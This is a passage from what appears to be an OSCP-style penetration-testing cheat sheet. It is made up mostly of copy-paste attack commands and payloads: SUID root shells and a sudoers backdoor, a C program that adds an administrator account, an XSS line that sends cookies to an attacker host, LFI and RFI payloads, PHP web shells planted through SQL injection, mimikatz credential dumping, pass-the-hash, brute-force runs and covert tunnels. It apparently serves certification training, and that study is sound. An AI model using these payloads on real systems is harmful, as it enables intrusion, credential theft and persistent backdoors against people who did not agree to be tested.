1213 | echo thePassword | passwd haxzor --stdin
1214 |
1215 | - Local Privilege Escalation Exploit in Linux
1216 |
1217 | - **SUID** (**S**et owner **U**ser **ID** up on execution)
1218 | Often SUID C binary files are required to spawn a shell as a
1219 | superuser, you can update the UID / GID and shell as required.
1220 |
1221 | below are some quick copy and paste examples for various
1222 | shells:
1223 |
1224 | SUID C Shell for /bin/bash
1225 |
1226 | int main(void){
1227 | setresuid(0, 0, 0);
1228 | system("/bin/bash");
1229 | }
1230 |
1231 | SUID C Shell for /bin/sh
1232 |
1233 | int main(void){
1234 | setresuid(0, 0, 0);
1235 | system("/bin/sh");
1236 | }
1237 |
1238 | Building the SUID Shell binary
1239 | gcc -o suid suid.c
1240 | For 32 bit:
1241 | gcc -m32 -o suid suid.c
1242 |
1243 | - Create and compile an SUID from a limited shell (no file
1244 | transfer)
1245 | echo "int main(void){\\nsetgid(0);
1246 | setuid(0);\\nsystem(\\"/bin/sh\\");\\n}" >privsc.c
1247 | gcc privsc.c -o privsc
1248 |
1249 | - Add users to Root SUDO group with no password requirement
1250 | echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:
1251 | ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' >
1252 | /tmp/update
1253 |
1254 | - SearchSploit
1255 | searchsploit –uncsearchsploit apache 2.2
1256 | searchsploit "Linux Kernel"
1257 | searchsploit linux 2.6 | grep -i ubuntu | grep local
1258 | searchsploit slmail
1259 |
1260 | - Kernel Exploit Suggestions for Kernel Version 3.0.0
1261 | ./usr/share/linux-exploit-suggester/Linux\_Exploit\_Suggester.pl -k 3.0.0
1262 |
1263 | - Precompiled Linux Kernel Exploits - ***Super handy if GCC is not installed on the target machine!***
1264 |
1265 | [*https://www.kernel-exploits.com/*](https://www.kernel-exploits.com/)
1266 |
1267 | - Collect root password
1268 | cat /etc/shadow |grep root
1269 |
1270 | - Find and display the proof.txt or flag.txt - LOOT!
1271 | `cat ``find / -name proof.txt -print```
1272 |
1273 | - Windows Privilege Escalation
1274 | --------------------------------------------------------------------------------------------------------------------------
1275 |
1276 | - Windows Privilege Escalation resource
1277 | http://www.fuzzysecurity.com/tutorials/16.html
1278 |
1279 | - Try the getsystem command using meterpreter - rarely works but is worth a try.
1280 | `meterpreter > getsystem`
1281 |
1282 | - Metasploit Meterpreter Privilege Escalation Guide
1283 | https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
1284 |
1285 | - Windows MS11-080 - http://www.exploit-db.com/exploits/18176/
1286 | python pyinstaller.py --onefile ms11-080.py
1287 | mx11-080.exe -O XP
1288 |
1289 | - Powershell Priv Escalation Tools
1290 | https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
1291 |
1292 | - Windows Service Configuration Viewer - Check for misconfigurations
1293 | in services that can lead to privilege escalation. You can replace
1294 | the executable with your own and have windows execute whatever code
1295 | you want as the privileged user.
1296 | icacls scsiaccess.exe
1297 |
1298 | > scsiaccess.exe
1299 | > NT AUTHORITY\\SYSTEM:(I)(F)
1300 | > BUILTIN\\Administrators:(I)(F)
1301 | > BUILTIN\\Users:(I)(RX)
1302 | > APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)
1303 | > Everyone:(I)(F)
1304 |
1305 | - Compile a custom add user command in windows using C
1306 | root@kali:~\# cat useradd.c
1307 | \#include <stdlib.h> /\* system, NULL, EXIT\_FAILURE \*/
1308 | int main ()
1309 | {
1310 | int i;
1311 | i=system ("net localgroup administrators low /add");
1312 | return 0;
1313 | }
1314 |
1315 | i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c
1316 |
1317 | - Group Policy Preferences (GPP)
1318 | A common useful misconfiguration found in modern domain environments
1319 | is unprotected Windows GPP settings files
1320 |
1321 | - map the Domain controller SYSVOL share
1322 | net use z: \\\\dc01\\SYSVOL
1323 |
1324 | - Find the GPP file: Groups.xml
1325 | dir /s Groups.xml
1326 |
1327 | - Review the contents for passwords
1328 | type Groups.xml
1329 |
1330 | - Decrypt using GPP Decrypt
1331 | gpp-decrypt
1332 | riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB
1333 |
1334 | - Find and display the proof.txt or flag.txt - get the loot!
1335 | `#meterpreter > run post/windows/gather/win_privs`
1336 |
1337 | `cd\ & dir /b /s proof.txt`
1338 | `type c:\pathto\proof.txt`
1339 |
1340 |
1341 | Client, Web and Password Attacks
1342 | ==============================================================================================================================
1343 |
1344 | - Client Attacks
1345 | ------------------------------------------------------------------------------------------------------------
1346 |
1347 | - MS12-037- Internet Explorer 8 Fixed Col Span ID
1348 | wget -O exploit.html
1349 |
1350 | service apache2 start
1351 |
1352 | - JAVA Signed Jar client side attack
1353 | echo '<applet width="1" height="1" id="Java Secure"
1354 | code="Java.class" archive="SignedJava.jar"><param name="1"
1355 | value="http://$ip:80/evil.exe"></applet>' >
1356 | /var/www/html/java.html
1357 | User must hit run on the popup that occurs.
1358 |
1359 | - Linux Client Shells
1360 | [*http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/*](http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/)
1361 |
1362 | - Setting up the Client Side Exploit
1363 |
1364 | - Swapping Out the Shellcode
1365 |
1366 | - Injecting a Backdoor Shell into Plink.exe
1367 | backdoor-factory -f /usr/share/windows-binaries/plink.exe -H $ip
1368 | -P 4444 -s reverse\_shell\_tcp
1369 |
1370 | - Web Attacks
1371 | ---------------------------------------------------------------------------------------------------------
1372 |
1373 | - Web Shag Web Application Vulnerability Assessment Platform
1374 | webshag-gui
1375 |
1376 | - Web Shells
1377 | [*http://tools.kali.org/maintaining-access/webshells*](http://tools.kali.org/maintaining-access/webshells)
1378 | ls -l /usr/share/webshells/
1379 |
1380 | - Generate a PHP backdoor (generate) protected with the given
1381 | password (s3cr3t)
1382 | weevely generate s3cr3t
1383 | weevely http://$ip/weevely.php s3cr3t
1384 |
1385 | - Java Signed Applet Attack
1386 |
1387 | - HTTP / HTTPS Webserver Enumeration
1388 |
1389 | - OWASP Dirbuster
1390 |
1391 | - nikto -h $ip
1392 |
1393 | - Essential Iceweasel Add-ons
1394 | Cookies Manager
1395 | https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/
1396 | Tamper Data
1397 | https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
1398 |
1399 | - Cross Site Scripting (XSS)
1400 | significant impacts, such as cookie stealing and authentication
1401 | bypass, redirecting the victim’s browser to a malicious HTML
1402 | page, and more
1403 |
1404 | - Browser Redirection and IFRAME Injection
1405 | <iframe SRC="http://$ip/report" height = "0" width
1406 | ="0"></iframe>
1407 |
1408 | - Stealing Cookies and Session Information
1409 | <script>
1410 | new
1411 | image().src="http://$ip/bogus.php?output="+document.cookie;
1412 | </script>
1413 | nc -nlvp 80
1414 |
1415 | - File Inclusion Vulnerabilities
1416 | -----------------------------------------------------------------------------------------------------------------------------
1417 |
1418 | - Local (LFI) and remote (RFI) file inclusion vulnerabilities are
1419 | commonly found in poorly written PHP code.
1420 |
1421 | - fimap - There is a Python tool called fimap which can be
1422 | leveraged to automate the exploitation of LFI/RFI
1423 | vulnerabilities that are found in PHP (sqlmap for LFI):
1424 | [*https://github.com/kurobeats/fimap*](https://github.com/kurobeats/fimap)
1425 |
1426 | - Gaining a shell from phpinfo()
1427 | fimap + phpinfo() Exploit - If a phpinfo() file is present,
1428 | it’s usually possible to get a shell, if you don’t know the
1429 | location of the phpinfo file fimap can probe for it, or you
1430 | could use a tool like OWASP DirBuster.
1431 |
1432 | - For Local File Inclusions look for the include() function in PHP
1433 | code.
1434 | include("lang/".$\_COOKIE\['lang'\]);
1435 | include($\_GET\['page'\].".php");
1436 |
1437 | - LFI - Encode and Decode a file using base64
1438 | curl -s
1439 | http://$ip/?page=php://filter/convert.base64-encode/resource=index
1440 | | grep -e '\[^\\ \]\\{40,\\}' | base64 -d
1441 |
1442 | - LFI - Download file with base 64 encoding
1443 | [*http://$ip/index.php?page=php://filter/convert.base64-encode/resource=admin.php*](about:blank)
1444 |
1445 | - LFI Linux Files:
1446 | /etc/issue
1447 | /proc/version
1448 | /etc/profile
1449 | /etc/passwd
1450 | /etc/passwd
1451 | /etc/shadow
1452 | /root/.bash\_history
1453 | /var/log/dmessage
1454 | /var/mail/root
1455 | /var/spool/cron/crontabs/root
1456 |
1457 | - LFI Windows Files:
1458 | %SYSTEMROOT%\\repair\\system
1459 | %SYSTEMROOT%\\repair\\SAM
1460 | %SYSTEMROOT%\\repair\\SAM
1461 | %WINDIR%\\win.ini
1462 | %SYSTEMDRIVE%\\boot.ini
1463 | %WINDIR%\\Panther\\sysprep.inf
1464 | %WINDIR%\\system32\\config\\AppEvent.Evt
1465 |
1466 | - LFI OSX Files:
1467 | /etc/fstab
1468 | /etc/master.passwd
1469 | /etc/resolv.conf
1470 | /etc/sudoers
1471 | /etc/sysctl.conf
1472 |
1473 | - LFI - Download passwords file
1474 | [*http://$ip/index.php?page=/etc/passwd*](about:blank)
1475 | [*http://$ip/index.php?file=../../../../etc/passwd*](about:blank)
1476 |
1477 | - LFI - Download passwords file with filter evasion
1478 | [*http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd*](about:blank)
1479 |
1480 | - Local File Inclusion - In versions of PHP below 5.3 we can
1481 | terminate with null byte
1482 | GET
1483 | /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00
1484 |
1485 | - Contaminating Log Files <?php echo
1486 | shell\_exec($\_GET\['cmd'\]);?>
1487 |
1488 | - For a Remote File Inclusion look for php code that is not
1489 | sanitized and passed to the PHP include function and the php.ini
1490 | file must be configured to allow remote files
1491 | /etc/php5/cgi/php.ini - “allow\_url\_fopen” and
1492 | “allow\_url\_include both set to “on”
1493 | include($\_REQUEST\["file"\].".php");
1494 |
1495 | - Remote File Inclusion
1496 | [http://$ip/addguestbook.php?name=a&comment=b&LANG=http://$localip/evil.txt](http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt)
1497 | <?php echo shell\_exec("ipconfig");?>
1498 |
1499 | - Database Vulnerabilities
1500 | ----------------------------------------------------------------------------------------------------------------------
1501 |
1502 | - MySQL SQL
1503 |
1504 | - Grab password hashes from a web application mysql database
1505 | called “Users” - once you have the MySQL root username and
1506 | password
1507 | mysql -u root -p -h $ip
1508 | use "Users"
1509 | show tables;
1510 | select \* from users;
1511 |
1512 | - Authentication Bypass
1513 | name='wronguser' or 1=1;\#
1514 | name='wronguser' or 1=1 LIMIT 1;\#
1515 |
1516 | - Enumerating the Database
1517 | [http://$ip/comment.php?id=738](http://192.168.11.35/comment.php?id=738)’
1518 | Verbose error message?
1519 | http://$ip/comment.php?id=738 order by 1
1520 | http://$ip/comment.php?id=738 union all select 1,2,3,4,5,6
1521 | Determine MySQL Version:
1522 | http://$ip/comment.php?id=738 union all select
1523 | 1,2,3,4,@@version,6
1524 | current user being used for the database connection
1525 | http://$ip/comment.php?id=738 union all select
1526 | 1,2,3,4,user(),6
1527 | we can enumerate database tables and column structures
1528 | http://$ip/comment.php?id=738 union all select
1529 | 1,2,3,4,table\_name,6 FROM information\_schema.tables
1530 | target the users table in the database
1531 | http://$ip/comment.php?id=738 union all select
1532 | 1,2,3,4,column\_name,6 FROM information\_schema.columns where
1533 | table\_name='users'
1534 | extract the name and password
1535 | http://$ip/comment.php?id=738 union select
1536 | 1,2,3,4,concat(name,0x3a, password),6 FROM users
1537 | Create a backdoor
1538 | http://$ip/comment.php?id=738 union all select 1,2,3,4,"<?php
1539 | echo shell\_exec($\_GET\['cmd'\]);?>",6 into OUTFILE
1540 | 'c:/xampp/htdocs/backdoor.php'
1541 |
1542 | - SQLMap Examples
1543 |
1544 | - Crawl the links
1545 | sqlmap -u http://$ip --crawl=1
1546 | sqlmap -u http://meh.com --forms --batch --crawl=10
1547 | --cookie=jsessionid=54321 --level=5 --risk=3
1548 | - SQLMap Search for databases against a suspected GET SQL Injection
1549 | point ‘search’**
1550 | sqlmap –u http://$ip/blog/index.php?search –dbs
1551 |
1552 | - SQLMap dump tables from database oscommerce at GET SQL injection point ‘search’
1553 | sqlmap –u http://$ip/blog/index.php?search= –dbs –D oscommerce –tables
1554 | –dumps
1555 | - SQLMap GET Parameter command
1556 | sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --dump
1557 | -threads=5
1558 | - SQLMap Post Username parameter
1559 | sqlmap -u http://$ip/login.php --method=POST
1560 | --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3
1561 | --level=5 --dbms=MySQL --dump-all
1562 | - SQL Map OS Shell
1563 | sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --osshell
1564 | sqlmap -u http://$ip/login.php --method=POST
1565 | --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3
1566 | --level=5 --dbms=MySQL --os-shell
1567 | - Automated sqlmap scan
1568 | sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE
1569 | --level=3 --current-user --current-db --passwords
1570 | --file-read="/var/www/blah.php"
1571 | - Targeted sqlmap scan
1572 | sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump
1573 | - Scan url for union + error based injection with mysql backend
1574 | and use a random user agent + database dump
1575 | sqlmap -o -u http://$ip/index.php --forms --dbs
1576 | sqlmap -o -u "http://$ip/form/" --forms
1577 | sqlmap check form for injection
1578 | sqlmap -o -u "http://$ip/vuln-form" --forms -D database-name -T users --dump
1579 | sqlmap dump and crack hashes for table users on database-name.
1580 |
1581 | Enumerate databases
1582 | sqlmap --dbms=mysql -u "$URL" --dbs
1583 | Enumerate tables from a specific database
1584 | sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables
1585 | Dump table data from a specific database and table
1586 | sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump
1587 | Specify parameter to exploit
1588 | sqlmap --dbms=mysql -u
1589 | "http://www.example.com/param1=value1¶m2=value2" --dbs -p param2
1590 | Specify parameter to exploit in 'nice' URIs
1591 | sqlmap --dbms=mysql -u
1592 | "http://www.example.com/param1/value1\*/param2/value2" --dbs \#
1593 | exploits param1
1594 | Get OS shell
1595 | sqlmap --dbms=mysql -u "$URL" --os-shell
1596 | Get SQL shell
1597 | sqlmap --dbms=mysql -u "$URL" --sql-shell
1598 | SQL query
1599 | sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT \*
1600 | FROM $TABLE;"
1601 | Use Tor Socks5 proxy
1602 | sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL"
1603 | --dbs
1604 |
1605 | - Password Attacks
1606 | --------------------------------------------------------------------------------------------------------------
1607 |
1608 | - AES Decryption
1609 | http://aesencryption.net/
1610 |
1611 | - Convert multiple webpages into a word list
1612 | for x in 'index' 'about' 'post' 'contact' ; do curl
1613 | http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' >>
1614 | webapp.txt ; done
1615 |
1616 | - Or convert html to word list dict
1617 | html2dic index.html.out | sort -u > index-html.dict
1618 |
1619 | - Default Usernames and Passwords
1620 |
1621 | - CIRT
1622 | [*http://www.cirt.net/passwords*](http://www.cirt.net/passwords)
1623 |
1624 | - Government Security - Default Logins and Passwords for
1625 | Networked Devices
1626 |
1627 | - [*http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php*](http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php)
1628 |
1629 | - Virus.org
1630 | [*http://www.virus.org/default-password/*](http://www.virus.org/default-password/)
1631 |
1632 | - Default Password
1633 | [*http://www.defaultpassword.com/*](http://www.defaultpassword.com/)
1634 |
1635 | - Brute Force
1636 |
1637 | - Nmap Brute forcing Scripts
1638 | [*https://nmap.org/nsedoc/categories/brute.html*](https://nmap.org/nsedoc/categories/brute.html)
1639 |
1640 | - Nmap Generic auto detect brute force attack
1641 | nmap --script brute -Pn <target.com or ip>
1642 | <enter>
1643 |
1644 | - MySQL nmap brute force attack
1645 | nmap --script=mysql-brute $ip
1646 |
1647 | - Dictionary Files
1648 |
1649 | - Word lists on Kali
1650 | cd /usr/share/wordlists
1651 |
1652 | - Key-space Brute Force
1653 |
1654 | - crunch 6 6 0123456789ABCDEF -o crunch1.txt
1655 |
1656 | - crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
1657 |
1658 | - crunch 8 8 -t ,@@^^%%%
1659 |
1660 | - Pwdump and Fgdump - Security Accounts Manager (SAM)
1661 |
1662 | - pwdump.exe - attempts to extract password hashes
1663 |
1664 | - fgdump.exe - attempts to kill local antiviruses before
1665 | attempting to dump the password hashes and
1666 | cached credentials.
1667 |
1668 | - Windows Credential Editor (WCE)
1669 |
1670 | - allows one to perform several attacks to obtain clear text
1671 | passwords and hashes
1672 |
1673 | - wce -w
1674 |
1675 | - Mimikatz
1676 |
1677 | - extract plaintexts passwords, hash, PIN code and kerberos
1678 | tickets from memory. mimikatz can also perform
1679 | pass-the-hash, pass-the-ticket or build Golden tickets
1680 | [*https://github.com/gentilkiwi/mimikatz*](https://github.com/gentilkiwi/mimikatz)
1681 | From metasploit meterpreter (must have System level access):
1682 | `meterpreter> load mimikatz
1683 | meterpreter> help mimikatz
1684 | meterpreter> msv
1685 | meterpreter> kerberos
1686 | meterpreter> mimikatz_command -f samdump::hashes
1687 | meterpreter> mimikatz_command -f sekurlsa::searchPasswords`
1688 |
1689 | - Password Profiling
1690 |
1691 | - cewl can generate a password list from a web page
1692 | `cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt`
1693 |
1694 | - Password Mutating
1695 |
1696 | - John the ripper can mutate password lists
1697 | nano /etc/john/john.conf
1698 | `john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt`
1699 |
1700 | - Medusa
1701 |
1702 | - Medusa, initiated against an htaccess protected web
1703 | directory
1704 | `medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10`
1705 |
1706 | - Ncrack
1707 |
1708 | - ncrack (from the makers of nmap) can brute force RDP
1709 | `ncrack -vv --user offsec -P password-file.txt rdp://$ip`
1710 |
1711 | - Hydra
1712 |
1713 | - Hydra brute force against SNMP
1714 | `hydra -P password-file.txt -v $ip snmp`
1715 |
1716 | - Hydra FTP known user and password list
1717 | `hydra -t 1 -l admin -P /root/Desktop/password.lst -vV $ip ftp`
1718 |
1719 | - Hydra SSH using list of users and passwords
1720 | `hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh`
1721 |
1722 | - Hydra SSH using a known password and a username list
1723 | `hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh`
1724 |
1725 | - Hydra SSH Against Known username on port 22
1726 | `hydra $ip -s 22 ssh -l -P big\_wordlist.txt`
1727 |
1728 | - Hydra POP3 Brute Force
1729 | `hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V`
1730 |
1731 | - Hydra SMTP Brute Force
1732 | `hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V`
1733 |
1734 | - Hydra attack http get 401 login with a dictionary
1735 | `hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin`
1736 |
1737 | - Hydra attack Windows Remote Desktop with rockyou
1738 | `hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip`
1739 |
1740 |
1741 | - Password Hash Attacks
1742 | -------------------------------------------------------------------------------------------------------------------
1743 |
1744 | - Online Password Cracking
1745 | [*https://crackstation.net/*](https://crackstation.net/)
1746 |
1747 | - Hashcat running on
1748 |
1749 | - Sample Hashes
1750 | [*http://openwall.info/wiki/john/sample-hashes*](http://openwall.info/wiki/john/sample-hashes)
1751 |
1752 | - Identify Hashes
1753 | hash-identifier
1754 |
1755 | - Crask linux hashes you must first unshadow them:
1756 | unshadow passwd-file.txt shadow-file.txt
1757 | unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
1758 |
1759 | - John the Ripper - Password Hash Cracking
1760 |
1761 | - john $ip.pwdump
1762 |
1763 | - john --wordlist=/usr/share/wordlists/rockyou.txt hashes
1764 |
1765 | - john --rules --wordlist=/usr/share/wordlists/rockyou.txt
1766 |
1767 | - john --rules --wordlist=/usr/share/wordlists/rockyou.txt
1768 | unshadowed.txt
1769 |
1770 | - JTR forced descrypt cracking with wordlist
1771 | john --format=descrypt --wordlist
1772 | /usr/share/wordlists/rockyou.txt hash.txt
1773 |
1774 | - JTR forced descrypt brute force cracking
1775 | john --format=descrypt hash --show
1776 |
1777 | - Passing the Hash in Windows
1778 |
1779 | - Use Metasploit to exploit one of the SMB servers in the labs.
1780 | Dump the password hashes and attempt a pass-the-hash attack
1781 | against another system:
1782 |
1783 | export
1784 | SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896
1785 |
1786 | pth-winexe -U administrator //$ip cmd
1787 |
1788 | Networking, Pivoting and Tunneling
1789 | ================================================================================================================================
1790 |
1791 | - Port Forwarding - accept traffic on a given IP address and port and
1792 | redirect it to a different IP address and port
1793 |
1794 | - apt-get install rinetd
1795 |
1796 | - cat /etc/rinetd.conf
1797 | \# bindadress bindport connectaddress connectport
1798 | w.x.y.z 53 a.b.c.d 80
1799 |
1800 | - SSH Local Port Forwarding: supports bi-directional communication
1801 | channels
1802 |
1803 | - ssh <gateway> -L <local port to listen>:<remote
1804 | host>:<remote port>
1805 |
1806 | - SSH Remote Port Forwarding: Suitable for popping a remote shell on
1807 | an internal non routable network
1808 |
1809 | - ssh <gateway> -R <remote port to bind>:<local
1810 | host>:<local port>
1811 |
1812 | - SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local
1813 | attacking box to tunnel ALL incoming traffic to ANY host in the DMZ
1814 | network on ANY PORT
1815 |
1816 | - ssh -D <local proxy port> -p <remote port>
1817 | <target>
1818 |
1819 | - Proxychains - Perform nmap scan within a DMZ from an external
1820 | computer
1821 |
1822 | - Create reverse SSH tunnel from Popped machine on :2222
1823 | ssh -f -N -R 2222:$ip:22 root@$ip
1824 |
1825 | - Create a Dynamic application-level port forward on 8080 thru
1826 | 2222
1827 | ssh -f -N -D $ip:8080 -p 2222 hax0r@$ip
1828 |
1829 | - Leverage the SSH SOCKS server to perform Nmap scan on network
1830 | using proxy chains
1831 | proxychains nmap --top-ports=20 -sT -Pn $ip/24
1832 |
1833 | - HTTP Tunneling
1834 | nc -vvn $ip 8888
1835 |
1836 | - Traffic Encapsulation - Bypassing deep packet inspection
1837 |
1838 | - http\_tunnel
1839 | On server side:
1840 | sudo hts -F <server\_ip\_addr>:<port\_of\_your\_app>
1841 | 80
1842 | On client side:
1843 | sudo htc -P <my\_proxy.com:proxy\_port> -F
1844 | <port\_of\_your\_app> <server\_ip\_addr>:80
1845 | stunnel
1846 |
1847 | - Tunnel Remote Desktop (RDP) from a Popped Windows machine to your
1848 | network
1849 |
1850 | - Tunnel on port 22
1851 | plink -l root -pw pass -R 3389:$ip:3389 $ip
1852 |
1853 | - Port 22 blocked? Try port 80? or 443?
1854 | plink -l root -pw 23847sd98sdf987sf98732 -R 3389:$ip:3389 $ip -P
1855 | 80
1856 |
1857 | - Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel
1858 | (bypass deep packet inspection)
1859 |
1860 | - Windows machine add required firewall rules without prompting
1861 | the user
1862 |
1863 | - netsh advfirewall firewall add rule name="httptunnel\_client"
1864 | dir=in action=allow program="httptunnel\_client.exe" enable=yes
1865 |
1866 | - netsh advfirewall firewall add rule name="3000" dir=in
1867 | action=allow protocol=TCP localport=3000
1868 |
1869 | - netsh advfirewall firewall add rule name="1080" dir=in
1870 | action=allow protocol=TCP localport=1080
1871 |
1872 | - netsh advfirewall firewall add rule name="1079" dir=in
1873 | action=allow protocol=TCP localport=1079
1874 |
1875 | - Start the http tunnel client
1876 | httptunnel\_client.exe
1877 |
1878 | - Create HTTP reverse shell by connecting to localhost port 3000
1879 | plink -l root -pw 23847sd98sdf987sf98732 -R 3389:$ip:3389 $ip -P
1880 | 3000
1881 |
1882 | - VLAN Hopping
1883 |
1884 | - git clone https://github.com/nccgroup/vlan-hopping.git
1885 | chmod 700 frogger.sh
1886 | ./frogger.sh
1887 |
1888 | - VPN Hacking
1889 |
1890 | - Identify VPN servers:
1891 | ./udp-protocol-scanner.pl -p ike $ip
1892 |
1893 | - Scan a range for VPN servers:
1894 | ./udp-protocol-scanner.pl -p ike -f ip.txt
1895 |
1896 | - Use IKEForce to enumerate or dictionary attack VPN servers:
1897 | pip install pyip
1898 | git clone
1899 | Perform IKE VPN enumeration with IKEForce:
1900 | ./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic
1901 | Bruteforce IKE VPN using IKEForce:
1902 | ./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w
1903 | passwords.txt -s 1
1904 | Use ike-scan to capture the PSK hash:
1905 | ike-scan
1906 | ike-scan TARGET-IP
1907 | ike-scan -A TARGET-IP
1908 | ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
1909 | ike-scan –M –A –n example\_group -P hash-file.txt TARGET-IP
1910 | Use psk-crack to crack the PSK hash
1911 | psk-crack hash-file.txt
1912 | pskcrack
1913 | psk-crack -b 5 TARGET-IPkey
1914 | psk-crack -b 5
1915 | --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
1916 | 192-168-207-134key
1917 | psk-crack -d /path/to/dictionary-file TARGET-IP-key
1918 |
1919 | - PPTP Hacking
1920 |
1921 | - Identifying PPTP, it listens on TCP: 1723
1922 | NMAP PPTP Fingerprint:
1923 | nmap –Pn -sV -p 1723 TARGET(S)
1924 | PPTP Dictionary Attack
1925 | thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst
1926 |
1927 | - Port Forwarding/Redirection
1928 |
1929 | - PuTTY Link tunnel - SSH Tunneling
1930 |
1931 | - Forward remote port to local address:
1932 | plink.exe -P 22 -l root -pw "1337" -R 445:$ip:445 $ip
1933 |
1934 | - SSH Pivoting
1935 |
1936 | - SSH pivoting from one network to another:
1937 | ssh -D $ip:1010 -p 22 user@$ip
1938 |
1939 | - DNS Tunneling
1940 |
1941 | - dnscat2 supports “download” and “upload” commands for getting
1942 | files (data and programs) to and from the target machine.
1943 |
1944 | - Attacking Machine Installation:
1945 | apt-get update
1946 | apt-get -y install ruby-dev git make g++
1947 | gem install bundler
1948 | git clone https://github.com/iagox86/dnscat2.git
1949 | cd dnscat2/server
1950 | bundle install
1951 |
1952 | - Run dnscat2:
1953 | ruby ./dnscat2.rb
1954 | dnscat2> New session established: 1422
1955 | dnscat2> session -i 1422
1956 |
1957 | - Target Machine:
1958 | https://downloads.skullsecurity.org/dnscat2/
1959 | https://github.com/lukebaggett/dnscat2-powershell/
1960 | dnscat --host <dnscat server\_ip>
1961 |
1962 | The Metasploit Framework
1963 | ======================================================================================================================
1964 |
1965 | - See [*Metasploit Unleashed
1966 | Course*](https://www.offensive-security.com/metasploit-unleashed/)
1967 | in the Essentials
1968 |
1969 | - Search for exploits using Metasploit GitHub framework source code:
1970 | [*https://github.com/rapid7/metasploit-framework*](https://github.com/rapid7/metasploit-framework)
1971 | Translate them for use on OSCP LAB or EXAM.
1972 |
1973 | - Metasploit
1974 |
1975 | - MetaSploit requires Postfresql
1976 | systemctl start postgresql
1977 |
1978 | - To enable Postgresql on startup
1979 | systemctl enable postgresql
1980 |
1981 | - MSF Syntax
1982 |
1983 | - Start metasploit
1984 | msfconsole
1985 | msfconsole -q
1986 |
1987 | - Show help for command
1988 | show -h
1989 |
1990 | - Show Auxiliary modules
1991 | show auxiliary
1992 |
1993 | - Use a module
1994 | use auxiliary/scanner/snmp/snmp\_enum
1995 | use auxiliary/scanner/http/webdav\_scanner
1996 | use auxiliary/scanner/smb/smb\_version
1997 | use auxiliary/scanner/ftp/ftp\_login
1998 | use exploit/windows/pop3/seattlelab\_pass
1999 |
2000 | - Show the basic information for a module
2001 | info
2002 |
2003 | - Show the configuration parameters for a module
2004 | show options
2005 |
2006 | - Set options for a module
2007 | set RHOSTS $ip-254
2008 | set THREADS 10
2009 |
2010 | - Run the module
2011 | run
2012 |
2013 | - Execute an Exploit
2014 | exploit
2015 |
2016 | - Search for a module
2017 | search type:auxiliary login
2018 |
2019 | - Metasploit Database Access
2020 |
2021 | - Show all hosts discovered in the MSF database
2022 | hosts
2023 |
2024 | - Scan for hosts and store them in the MSF database
2025 | db\_nmap
2026 |
2027 | - Search machines for specific ports in MSF database
2028 | services -p 443
2029 |
2030 | - Leverage MSF database to scan SMB ports (auto-completed
2031 | rhosts)
2032 | services -p 443 --rhosts
2033 |
2034 | - Staged and Non-staged
2035 |
2036 | - Non-staged payload - is a payload that is sent in its entirety
2037 | in one go
2038 |
2039 | - Staged - sent in two parts
2040 | Not have enough buffer space
2041 | Or need to bypass antivirus
2042 |
2043 | - Experimenting with Meterpreter
2044 |
2045 | - Get system information from Meterpreter Shell
2046 | sysinfo
2047 |
2048 | - Get user id from Meterpreter Shell
2049 | getuid
2050 |
2051 | - Search for a file
2052 | search -f \*pass\*.txt
2053 |
2054 | - Upload a file
2055 | upload /usr/share/windows-binaries/nc.exe c:\\\\Users\\\\Offsec
2056 |
2057 | - Download a file
2058 | download c:\\\\Windows\\\\system32\\\\calc.exe /tmp/calc.exe
2059 |
2060 | - Invoke a command shell from Meterpreter Shell
2061 | shell
2062 |
2063 | - Exit the meterpreter shell
2064 | exit
2065 |
2066 | - Metasploit Exploit Multi Handler
2067 |
2068 | - multi/handler to accept an incoming reverse\_https\_meterpreter
